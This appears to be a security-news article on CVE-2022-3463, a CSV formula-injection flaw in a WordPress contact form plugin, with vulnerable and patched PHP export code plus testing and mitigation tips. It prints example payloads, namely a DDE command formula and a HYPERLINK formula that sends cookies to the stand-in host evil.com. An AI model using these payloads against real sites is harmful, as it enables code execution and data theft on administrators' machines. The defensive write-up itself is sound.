CVE CyberSecurity Database News

CVE-2022-3463 - How Contact Form Plugin’s CSV Export Can Inject Danger into Your Business

Poster -

The popular Contact Form Plugin for WordPress helps thousands of websites collect user data safely—or so you’d hope. But before version 4.3.13, it had a sneaky vulnerability that made it possible for attackers to smuggle in dangerous commands right into your spreadsheet: CSV Injection, also known as Formula Injection.

If you manage submissions and download your CSV reports to open in Excel, LibreOffice, or another spreadsheet app, you could be opening the door to a hack. In this long read, I’ll break down how CVE-2022-3463 works, the real risks, and how you can test and secure your site.

What is CSV Injection?

CSV Injection happens when unsanitized user input gets exported into a CSV file. Modern spreadsheets don’t just display numbers and text—they execute anything that looks like a formula. If an attacker submits something like =cmd|'/C calc'!A into your contact form, and you open your submission file in Excel, this can trigger dangerous actions.

Typical spreadsheet formula starters:

-

Opening a malicious CSV could run commands, steal data, or infect your computer.

How CVE-2022-3463 Happens in Contact Form Plugin

Before version 4.3.13, Contact Form Plugin did NOT properly validate or escape form entries when exporting them to a CSV file. That means any form field—name, message, email—could include a malicious payload.

Let’s say a bad actor sends this as their "name" field

=HYPERLINK("http://evil.com?cookie="&CMD|'; /C calc'!A1)

You, as an admin, later export form submissions and open the CSV in Excel. Excel sees the field starting with =, and treats it as a formula. If you have any macros or dangerous settings enabled, this formula can run code, call out to malicious URLs, or worse.

Suppose your contact form collects "Name", "Email", and "Message". An attacker submits

| Name                          | Email           | Message                |
|-------------------------------|-----------------|------------------------|
| =cmd|'/C calc'!A             | evil@badguy.com | Hello site admin!      |

You export your form entries in CSV and see

"=cmd|'/C calc'!A","evil@badguy.com","Hello site admin!"

Upon opening this in some versions of Excel on Windows, it opens Calculator—but in a real attack, this could run powershell, fetch malware, or send your local files to an attacker.

Before the fix, CSV export might have looked like this (PHP)

foreach ($rows as $row) {
    echo '"' . implode('","', $row) . "\"\n";
}

The fields are dumped directly. No check for dangerous characters. No escaping.

How the Patch Works

After 4.3.13, the plugin escapes dangerous characters in form fields that might be exported to CSV.

A basic mitigation (simplified) looks like

function escape_csv_field($field) {
    if (preg_match('/^(\=|\+|\-|\@)/', $field)) {
        $field = "'".$field; // prepend single quote
    }
    return $field;
}

// When exporting each field:
foreach ($rows as $row) {
    $clean_row = array_map('escape_csv_field', $row);
    echo '"' . implode('","', $clean_row) . "\"\n";
}


Adding a single quote ' in front makes Excel treat the field as plain text, not a formula.

Responsible Disclosure & References

- Official plugin page: Contact Form Plugin – WordPress

Security advisory:

- WPScan Advisory
- Original CVE Record
- General background: CSV Injection Cheat Sheet — PortSwigger

How Can You Test for This?

1. Try to Submit a Malicious Field  
Submit =2+5 as your name or message.

2. Export as CSV and Open it in Excel  
If Excel displays a result of 7 instead of =2+5, you are vulnerable!

Update to version 4.3.13 or later of the Contact Form Plugin immediately.

- If you must handle CSV exports from unpatched plugins, do NOT open them in Excel or LibreOffice unless you’ve sanitized the data.

Consider viewing CSVs in a text editor for review first.

- Use OWASP recommendations for handling CSV files.

Final Thoughts

CVE-2022-3463 is a great reminder: user input is never safe, not even in a simple contact form. One careless click can mean a disaster for your device or even your whole business. Always keep your plugins up-to-date, and never trust input—especially when it could end up as an executable formula!

Timeline

Published on: 11/07/2022 10:15:00 UTC
Last modified on: 11/09/2022 20:09:00 UTC